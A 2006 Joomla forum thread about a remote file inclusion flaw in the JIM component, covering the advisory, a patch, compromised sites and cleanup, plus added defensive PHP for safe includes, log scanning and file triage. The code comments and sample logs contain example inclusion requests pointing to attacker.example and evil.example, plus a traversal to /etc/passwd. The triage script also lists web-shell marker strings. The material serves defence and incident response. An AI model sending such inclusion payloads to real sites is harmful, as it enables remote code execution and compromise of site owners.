Joomla JIM Component File Inclusion Vulnerability
- smart
- Joomla! Enthusiast
- Posts: 109
- Joined: Thu Aug 18, 2005 1:33 pm
- Location: Sebastopol
- Contact:
Joomla JIM Component File Inclusion Vulnerability
Secunia Advisory: SA21545 Print Advisory
Release Date: 2006-08-18
Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched
Software: JIM 1.x (component for Joomla)
Description:
XORON has discovered a vulnerability in the JIM component for Joomla, which can be exploited by malicious people to compromise a vulnerable system.
Input passed to the "mosConfig_absolute_path" parameter in components/com_jim/install.jim.php is not properly verified, before it is used to include files. This can be exploited to include arbitrary files from external and local resources.
Successful exploitation requires that "register_globals" is enabled.
The vulnerability has been confirmed in version 1.0.1. Other versions may also be affected.
Solution:
Edit the source code to ensure that the input is properly verified.
Set "register_globals" to "Off".
Read more: http://secunia.com/advisories/21545/
Joomlaportal.ru News, articles and tutorials
Joomlaforum.ru Russian Joomla Support Forum
Member of the Russian Joomla Translation Team
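The following is an added illustration written for this page, not code from JIM or from the advisory. The only line it borrows from the thread is the require_once that globule quotes below; the resolver, its names and the temporary directory used for the demonstration are assumptions. It shows why that one line is a remote and local file inclusion when register_globals is On, and what a replacement that does not trust a request-settable global looks like.

```php
<?php
// Added example, not JIM's own code. The only line taken from the thread is the
// require_once quoted below; the resolver, its name and the demo paths are
// assumptions made for this illustration.

// ---- Vulnerable shape (what the advisory describes) -------------------------
// With register_globals=On, PHP turns every request parameter into a global
// before install.jim.php runs. Requested directly from the web as
//   install.jim.php?mosConfig_absolute_path=http://attacker.example/x
// the line
//   require_once($mosConfig_absolute_path."/components/com_jim/readme.txt");
// fetches and executes http://attacker.example/x/components/com_jim/readme.txt
// (allow_url_fopen lets require_once read over HTTP). A local value such as
// ../../../../etc/passwd turns the same line into local file inclusion.
//
// Joomla 1.0 defines _VALID_MOS in index.php before loading any component, so
// the usual first line of a component file stops the direct request outright:
//   defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');
// The resolver below is the second half of the fix: never take the install
// root from a variable the request can set, and only include files that
// really sit below that root.

/**
 * Return the canonical path of $relative under $root, or false when it is
 * missing, carries a stream wrapper (http://, php://, data:) or escapes the
 * root. realpath() collapses ".." and symlinks before the prefix check.
 */
function jim_resolve_include($root, $relative)
{
    $root = realpath($root);
    if ($root === false) {
        return false;
    }
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $relative)) {
        return false;
    }
    $target = realpath($root . DIRECTORY_SEPARATOR . $relative);
    if ($target === false || strpos($target, $root . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $target;
}

// The hardened include: the root comes from this file's own location, which
// a request cannot influence, and the relative part is a constant.
function jim_safe_require($relative)
{
    // For a file at <root>/components/com_jim/install.jim.php the site root is
    // two levels up; __FILE__ is set by PHP and cannot be set by the request.
    $root   = dirname(dirname(dirname(__FILE__)));
    $target = jim_resolve_include($root, $relative);
    if ($target === false) {
        return false;
    }
    require_once($target);
    return true;
}

// ---- Demonstration on a constructed tree in the temp directory --------------
$root = sys_get_temp_dir() . '/jim_demo_' . getmypid();
mkdir($root . '/components/com_jim', 0700, true);
file_put_contents($root . '/components/com_jim/readme.txt', "JIM readme\n");
$outside = sys_get_temp_dir() . '/jim_outside_' . getmypid() . '.txt';
file_put_contents($outside, "not part of the site\n");

$cases = array(
    'components/com_jim/readme.txt',      // legitimate: resolved
    'http://attacker.example/x',          // remote inclusion: rejected
    '../' . basename($outside),           // traversal out of root: rejected
    'components/com_jim/missing.txt',     // nonexistent: rejected
);
foreach ($cases as $c) {
    $r = jim_resolve_include($root, $c);
    printf("%-40s => %s\n", $c, $r === false ? 'REJECTED' : 'ok: ' . $r);
}

unlink($outside);
unlink($root . '/components/com_jim/readme.txt');
rmdir($root . '/components/com_jim');
rmdir($root . '/components');
rmdir($root);
```

Run it from the command line with `php` and the first case resolves while the other three are rejected. Note that setting register_globals to Off in php.ini is what protects against the direct request here: Joomla 1.0's own globals.php emulates register_globals, but only for requests that go through index.php, and a direct request to install.jim.php never loads it.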
- globule
- Joomla! Guru
- Posts: 551
- Joined: Tue Aug 30, 2005 9:11 pm
- Location: Aix-En-Provence, France
- Contact:
Re : Joomla JIM Component File Inclusion Vulnerability
URGENT You can make JIM secure (for this point) by removing line 16 in install.jim.php:
```php
require_once($mosConfig_absolute_path."/components/com_jim/readme.txt");
```
Any user who is a victim of an attack using JIM will get free support on:
http://www.joomlation.eu (intl)
or
http://www.joomlation.org (fr)
Last edited by globule on Fri Aug 18, 2006 1:33 pm, edited 1 time in total.
- Tonie
- Joomla! Master
- Posts: 16553
- Joined: Thu Aug 18, 2005 7:13 am
Re: Joomla JIM Component File Inclusion Vulnerability
@globule. That was fast, good to read. Just sent you an email five minutes ago.
- globule
- Joomla! Guru
- Posts: 551
- Joined: Tue Aug 30, 2005 9:11 pm
- Location: Aix-En-Provence, France
- Contact:
Re : Joomla JIM Component File Inclusion Vulnerability
I subscribed to Secunia a few days ago! :P
I was cooking for my children when I was informed
Thanks for the information anyway!
All "Come on... Joomla!" members have been informed through the newsletter. As this site will soon close, my efforts (Jim included) go to Joomlation.
Here is the patched file for users. Use FTP to update /administrator/components/com_jim/install.jim.php
You don't need to remove JIM. If you do so, you will lose ALL messages (this is already corrected for the next version)
The patch is also available on Joomlation.eu
Last edited by globule on Fri Aug 18, 2006 1:52 pm, edited 1 time in total.
-
- Joomla! Explorer
- Posts: 469
- Joined: Thu Aug 18, 2005 10:40 pm
- Location: las vegas USA
- Contact:
Re: Joomla JIM Component File Inclusion Vulnerability
http://www.joomlation.eu/
Forbidden
You don't have permission to access / on this server.
Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.
Joomla 1.6 Turkish support site http://www.joomlaturk.net/
- globule
- Joomla! Guru
- Posts: 551
- Joined: Tue Aug 30, 2005 9:11 pm
- Location: Aix-En-Provence, France
- Contact:
Re : Joomla JIM Component File Inclusion Vulnerability
It works for me!
Where are you from?
-
- Joomla! Apprentice
- Posts: 11
- Joined: Thu Jan 12, 2006 12:45 am
- Location: Westland, MI
- Contact:
Re: Joomla JIM Component File Inclusion Vulnerability
Well, I had people from 14 different countries do a google search on inurl:com_jim and they tagged me good. My site is completely down for now.
Luckily for me I was at the top of the google search (mixed blessing).
Scott
http://www.shutchi2.com
-
- Joomla! Explorer
- Posts: 469
- Joined: Thu Aug 18, 2005 10:40 pm
- Location: las vegas USA
- Contact:
Re: Re : Joomla JIM Component File Inclusion Vulnerability
globule wrote: It works for me!
Where are you from?
of course it works for you!!
I am from İstanbul, Turkey.
most likely you banned all the Turkish IPs.
I am fed up arguing about this subject.... I've given up!!!
you guys do whatever makes you happy... I respect your decision.
I can connect to http://www.joomlation.org/ but my French sucks!
EDIT
thanks for removing the IP ban, globule..
I appreciate your decision.
Last edited by Anonymous on Fri Aug 18, 2006 1:26 pm, edited 1 time in total.
Joomla 1.6 Turkish support site http://www.joomlaturk.net/
- globule
- Joomla! Guru
- Posts: 551
- Joined: Tue Aug 30, 2005 9:11 pm
- Location: Aix-En-Provence, France
- Contact:
Re : Joomla JIM Component File Inclusion Vulnerability
Now that JIM has been attacked, the whole site can be considered tested and safe (I hope...)
So this filter will soon be removed. I'm sorry I had to take such a decision...
- globule
- Joomla! Guru
- Posts: 551
- Joined: Tue Aug 30, 2005 9:11 pm
- Location: Aix-En-Provence, France
- Contact:
Re : Re: Joomla JIM Component File Inclusion Vulnerability
shutchi2 wrote: Well, I had people from 14 different countries do a google search on inurl:com_jim and they tagged me good. My site is completely down for now.
Luckily for me I was at the top of the google search (mixed blessing).
Scott
http://www.shutchi2.com
Is it down because you've been hacked?
-
- Joomla! Apprentice
- Posts: 11
- Joined: Thu Jan 12, 2006 12:45 am
- Location: Westland, MI
- Contact:
Re: Joomla JIM Component File Inclusion Vulnerability
It appears that way, but I'm going through logs right now to figure out what happened. I'm on the console and the server is working but it looks like some files were modified. Keeping it offline until I figure out what got changed.
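Added as an example of the log review described in the post above; it is not something the poster ran and not part of JIM. It parses Apache "combined" format lines and flags the request shape the advisory describes: a direct request to install.jim.php, and a client-supplied mosConfig_absolute_path that is a URL or a traversal. The five log lines are constructed for the example and every address, host name and file name in them is invented.

```php
<?php
// Added example, not from the thread: pick the advisory's probe out of an Apache
// "combined" access log. The five log lines are constructed for this example;
// every address, host name and file name in them is invented.

$sample_log = <<<'LOG'
203.0.113.7 - - [18/Aug/2006:13:02:11 +0200] "GET /index.php?option=com_jim&Itemid=35 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
198.51.100.23 - - [18/Aug/2006:13:05:40 +0200] "GET /components/com_jim/install.jim.php?mosConfig_absolute_path=http://evil.example/shell.txt? HTTP/1.0" 200 512 "-" "libwww-perl/5.805"
198.51.100.23 - - [18/Aug/2006:13:05:41 +0200] "GET /components/com_jim/install.jim.php?mosConfig_absolute_path=../../../../etc/passwd%00 HTTP/1.0" 200 2201 "-" "libwww-perl/5.805"
192.0.2.9 - - [18/Aug/2006:13:07:02 +0200] "GET /components/com_jim/install.jim.php HTTP/1.1" 200 40 "-" "Mozilla/4.0"
203.0.113.7 - - [18/Aug/2006:13:09:15 +0200] "POST /administrator/index.php?option=com_jim HTTP/1.1" 303 0 "http://www.example/administrator/" "Mozilla/5.0"
LOG;

/** Split one combined-format line into its fields; null if it does not parse. */
function parse_combined($line)
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+) "([^"]*)" "([^"]*)"/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    $path  = $m[4];
    $query = array();
    if (($q = strpos($path, '?')) !== false) {
        parse_str(substr($path, $q + 1), $query);   // also URL-decodes, so %00 becomes a NUL byte
        $path = substr($path, 0, $q);
    }
    return array('ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'path' => $path,
                 'query' => $query, 'status' => (int)$m[5], 'agent' => $m[8]);
}

/** Reasons a request is worth a look; empty array when it is not. */
function jim_probe_reasons($req)
{
    $reasons = array();
    // The component is meant to be reached through index.php; a request that
    // names install.jim.php itself is exactly what the advisory needs.
    if (basename($req['path']) === 'install.jim.php') {
        $reasons[] = 'direct request to install.jim.php';
    }
    if (isset($req['query']['mosConfig_absolute_path'])) {
        $v = $req['query']['mosConfig_absolute_path'];
        if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $v)) {
            $reasons[] = 'remote file inclusion: mosConfig_absolute_path=' . $v;
        } elseif (strpos($v, '..') !== false || strpos($v, "\0") !== false) {
            $reasons[] = 'local file inclusion / traversal: mosConfig_absolute_path=' . str_replace("\0", '\0', $v);
        } else {
            $reasons[] = 'client supplied mosConfig_absolute_path';
        }
    }
    return $reasons;
}

$by_ip = array();
foreach (explode("\n", trim($sample_log)) as $line) {
    $req = parse_combined($line);
    if ($req === null) {
        continue;
    }
    $why = jim_probe_reasons($req);
    if (!$why) {
        continue;
    }
    // A 200 on the probe means the include line ran; with a remote URL that
    // is code execution, so the status matters as much as the URL does.
    printf("%s %s %s %s status=%d\n  %s\n", $req['time'], $req['ip'], $req['method'],
           $req['path'], $req['status'], implode("\n  ", $why));
    $by_ip[$req['ip']] = isset($by_ip[$req['ip']]) ? $by_ip[$req['ip']] + 1 : 1;
}
arsort($by_ip);
foreach ($by_ip as $ip => $n) {
    printf("%-16s %d flagged request(s)\n", $ip, $n);
}
```

On the constructed sample the two libwww-perl requests and the bare direct request are flagged and the two index.php requests are not. To run it over a real log, replace $sample_log with the file contents; a 200 on a flagged request with a remote URL is the point from which to treat the host as compromised rather than merely probed.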
- globule
- Joomla! Guru
- Posts: 551
- Joined: Tue Aug 30, 2005 9:11 pm
- Location: Aix-En-Provence, France
- Contact:
Re : Joomla JIM Component File Inclusion Vulnerability
You can get the list of all your files sorted by last modification date on joomlation.eu : filist.php
Once you get this list, remove this script...
- globule
- Joomla! Guru
- Posts: 551
- Joined: Tue Aug 30, 2005 9:11 pm
- Location: Aix-En-Provence, France
- Contact:
Re : Re: Joomla JIM Component File Inclusion Vulnerability
shutchi2 wrote: Well, I had people from 14 different countries do a google search on inurl:com_jim and they tagged me good.
Thanks for reminding me of this function!
I contacted all sites listed (2 pages) except one having no information about how to do so: http://www.infopyme.com.py
I also noticed many of the versions used on these sites are not up to date... This will be taken into consideration for the next version.
This forum url has been sent to Secunia as source for the patch.
Thanks a lot to joomla.org and its community to keep users informed so fast.
-
- Joomla! Explorer
- Posts: 469
- Joined: Thu Aug 18, 2005 10:40 pm
- Location: las vegas USA
- Contact:
Re: Re : Joomla JIM Component File Inclusion Vulnerability
globule wrote: You can get the list of all your files sorted by last modification date on joomlation.eu : filist.php
Once you get this list, remove this script...
I urge every joomla user to utilize the filist.php tool.
it takes 2 seconds to find hacker scripts in your server with this method.
anybody that uploaded shell scripts will show at the top of the list.
simply remove them ( DO NOT DOWNLOAD )
your anti virus program will give a virus alert if you try to download.
Joomla 1.6 Turkish support site http://www.joomlaturk.net/
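The script below is an added example of the method globule and joomlaturk describe in the two posts above: list every file under the site, newest first, and look at the top of the list. It is a stand-in written for this page, not the filist.php distributed on joomlation.eu, and it goes a little further than a plain listing by also marking PHP files in data directories, odd file names, and recently changed files that contain strings common in dropped shells. The window, directory names and marker strings are assumptions.

```php
<?php
// Added example: a stand-in for the filist.php the thread points to, not that
// script itself. Drop it in the site root, run it once (from the shell or the
// browser), read the output, then delete it as the thread says. The window,
// directory names and shell markers below are assumptions; adjust to taste.

$root   = isset($argv[1]) ? $argv[1] : dirname(__FILE__);
$window = isset($argv[2]) ? (int)$argv[2] : 7;       // days to treat as "recent"
$cutoff = time() - $window * 86400;
$newest = 25;                                         // newest files printed regardless

// Strings rare in Joomla 1.0 code but common in dropped PHP shells.
$shell_markers = array('eval(base64_decode(', 'passthru(', 'shell_exec(', 'system($_', 'popen(');
// Directories that should hold data only; a .php file there is a red flag.
$data_dirs = '#/(images|media|cache|tmp|uploads)/#';

/** All regular files under $root as path => mtime, newest first. */
function list_by_mtime($root)
{
    $files = array();
    $dir = new RecursiveDirectoryIterator($root, RecursiveDirectoryIterator::SKIP_DOTS);
    // CATCH_GET_CHILD keeps going when a subdirectory is unreadable.
    $it = new RecursiveIteratorIterator($dir, RecursiveIteratorIterator::LEAVES_ONLY,
                                        RecursiveIteratorIterator::CATCH_GET_CHILD);
    foreach ($it as $path => $info) {
        if ($info->isFile()) {
            $files[$path] = $info->getMTime();
        }
    }
    arsort($files);
    return $files;
}

/** Why this file deserves a look; empty array if it looks ordinary. */
function suspicious_reasons($path, $mtime, $cutoff, $data_dirs, $markers)
{
    $reasons = array();
    $base = basename($path);
    $ext  = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    $code = in_array($ext, array('php', 'phtml', 'php3', 'php4', 'php5', 'inc'));
    if ($mtime >= $cutoff) {
        $reasons[] = 'modified recently';
    }
    if ($code && preg_match($data_dirs, $path)) {
        $reasons[] = 'PHP file in a data directory';
    }
    // Names like shell.php.jpg, or a "php.<something>" file that is not php.ini
    if (preg_match('#\.php\.[a-z0-9]+$#i', $base)
        || (strncasecmp($base, 'php.', 4) === 0 && $base !== 'php.ini')) {
        $reasons[] = 'odd file name';
    }
    if ($reasons && is_readable($path) && filesize($path) <= 512 * 1024) {
        $head = file_get_contents($path, false, null, 0, 65536);
        foreach ($markers as $m) {
            if (strpos($head, $m) !== false) {
                $reasons[] = "contains $m";
                break;
            }
        }
    }
    return $reasons;
}

$files = list_by_mtime($root);
$n = 0;
foreach ($files as $path => $mtime) {
    $why = suspicious_reasons($path, $mtime, $cutoff, $data_dirs, $shell_markers);
    if ($n++ >= $newest && !$why) {
        continue;                     // past the newest N, only print flagged files
    }
    printf("%s %9d %s%s\n", date('Y-m-d H:i:s', $mtime), filesize($path), $path,
           $why ? '   <-- ' . implode('; ', $why) : '');
}
```

Usage: `php filist-example.php /path/to/joomla 7` from a shell, or place it in the site root and open it in a browser for the defaults. Treat the output as a triage list, not proof: an intruder can reset modification times with touch, so a file that is not near the top is not cleared, and the reliable check is a diff against a clean copy of the same Joomla and component release. Remove the script when done, since it shows the whole tree to anyone who can reach it.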
-
- Joomla! Apprentice
- Posts: 11
- Joined: Thu Jan 12, 2006 12:45 am
- Location: Westland, MI
- Contact:
Re: Joomla JIM Component File Inclusion Vulnerability
Found a php.haxplore file that was recently added, looking for info on it...anyone familiar with this?
-
- Joomla! Apprentice
- Posts: 11
- Joined: Thu Jan 12, 2006 12:45 am
- Location: Westland, MI
- Contact:
Re: Joomla JIM Component File Inclusion Vulnerability
Well I'm back up and patched, my AV went nuts with the php.haxplore file so I deleted it. Thanks for your help everyone, and that filist.php script works great!
Scott
- globule
- Joomla! Guru
- Posts: 551
- Joined: Tue Aug 30, 2005 9:11 pm
- Location: Aix-En-Provence, France
- Contact:
Re : Joomla JIM Component File Inclusion Vulnerability
Don't forget to remove it!
Was Jim used to upload the file? What the logs told you?
-
- Joomla! Apprentice
- Posts: 11
- Joined: Thu Jan 12, 2006 12:45 am
- Location: Westland, MI
- Contact:
Re: Joomla JIM Component File Inclusion Vulnerability
The logs didn't tell me what they used to upload it, just where it came from (proxy). Sometimes win32 servers leave something to be desired...
-
- Joomla! Intern
- Posts: 73
- Joined: Thu Sep 08, 2005 6:37 am
Re: Re : Joomla JIM Component File Inclusion Vulnerability
joomlaturk wrote:
globule wrote: You can get the list of all your files sorted by last modification date on joomlation.eu : filist.php
Once you get this list, remove this script...
I urge every joomla user to utilize the filist.php tool.
it takes 2 seconds to find hacker scripts in your server with this method.
anybody that uploaded shell scripts will show at the top of the list.
simply remove them ( DO NOT DOWNLOAD )
your anti virus program will give a virus alert if you try to download.
But can you tell a novice exactly how you use the filist.php tool? Do you upload it to your server - where???
-
- Joomla! Apprentice
- Posts: 31
- Joined: Fri Sep 02, 2005 12:17 pm
Re: Joomla JIM Component File Inclusion Vulnerability
filist.php doesn't seem to be available from joomlation.eu
Any alternative tool or source?
- globule
- Joomla! Guru
- Posts: 551
- Joined: Tue Aug 30, 2005 9:11 pm
- Location: Aix-En-Provence, France
- Contact:
Re: Joomla JIM Component File Inclusion Vulnerability
trebso wrote: filist.php doesn't seem to be available from joomlation.eu
Any alternative tool or source?
Of course it is!
http://joomlation.eu/index.php?option=c ... &Itemid=35
-
- Joomla! Apprentice
- Posts: 31
- Joined: Fri Sep 02, 2005 12:17 pm
Re: Joomla JIM Component File Inclusion Vulnerability
My mistake - I searched for filist.php not filist.
Thanks